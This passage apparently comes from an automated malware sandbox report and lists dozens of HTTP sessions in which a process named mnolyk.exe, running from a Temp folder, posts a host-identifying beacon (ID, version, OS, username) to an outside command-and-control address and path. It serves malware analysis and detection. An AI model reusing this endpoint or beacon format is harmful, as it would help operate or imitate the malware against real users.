                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:36.212770939 CET669INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:36 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    47192.168.2.34974962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:28.419019938 CET248OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:28.485996962 CET248INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:28 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    470192.168.2.35017362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:36.396312952 CET670OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:36.461721897 CET670INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:36 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    471192.168.2.35017462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:36.644072056 CET671OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:36.708138943 CET671INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:36 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    472192.168.2.35017562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:36.875659943 CET672OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:36.942636967 CET672INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:36 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    473192.168.2.35017662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:37.109603882 CET673OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:37.178168058 CET673INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:37 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    474192.168.2.35017762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:37.364650965 CET674OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:37.431649923 CET674INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:37 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    475192.168.2.35017862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:37.609951019 CET675OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:37.674874067 CET675INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:37 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    476192.168.2.35017962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:37.860729933 CET676OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:37.925077915 CET676INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:37 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    477192.168.2.35018062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:38.094943047 CET677OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:38.160731077 CET677INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:38 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    478192.168.2.35018162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:38.330595970 CET678OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:38.395766973 CET678INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:38 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    479192.168.2.35018262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:38.560889959 CET679OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:38.623030901 CET679INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:38 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    48192.168.2.34975062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:28.669504881 CET249OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:28.733625889 CET249INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:28 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    480192.168.2.35018362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:38.796160936 CET680OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:38.859824896 CET680INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:38 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    481192.168.2.35018462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:39.029652119 CET681OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:39.094435930 CET681INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:39 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    482192.168.2.35018562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:39.263108015 CET682OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:39.326050043 CET682INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:39 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    483192.168.2.35018662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:39.504951000 CET683OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:39.570188999 CET683INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:39 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    484192.168.2.35018762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:39.749922991 CET684OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:39.813281059 CET684INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:39 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    485192.168.2.35018862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:39.982940912 CET685OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:40.048501015 CET685INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:40 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    486192.168.2.35018962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:40.218272924 CET686OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:40.283301115 CET686INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:40 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    487192.168.2.35019062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
